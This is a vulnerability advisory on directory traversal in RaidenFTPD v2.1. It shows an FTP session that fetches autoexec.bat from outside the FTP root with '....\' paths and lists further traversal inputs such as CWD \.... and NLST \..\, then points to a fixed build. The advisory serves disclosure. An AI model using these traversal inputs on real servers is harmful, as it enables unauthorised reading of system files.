COMMAND
RaidenFTPD Server
SYSTEMS AFFECTED
RaidenFTPD Server v2.1
PROBLEM
Joe Testa found following. RaidenFTPD v2.1 is an ftp server
available from http://playstation2.idv.tw/raidenftpd.
Vulnerabilities exist which allow users to break out of the ftp
root.
The following is an illustration of the problem:
> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog .
Password:
[really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226-Ñ+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+
226-¦¦½ßñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+
226-Ñ+½e¬¦Ñ++²¼O /
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250-ª¦Ñ++²¦-ñU¬+¦í 1323 mb
250 "/.." is current directory.
This excerpt was taken from a session involving build #947. The
vendor released four builds since Joe initially contacted them to
address additional variations. The following is a list of
vulnerabilities which affected these intermediate versions:
CWD \....
CWD *\.....
CWD /..../
NLST ..
NLST ...
NLST \..\
NLST \...\
SOLUTION
Upgrade to build #952 at:
http://playstation2.idv.tw/raidenftpd/download.html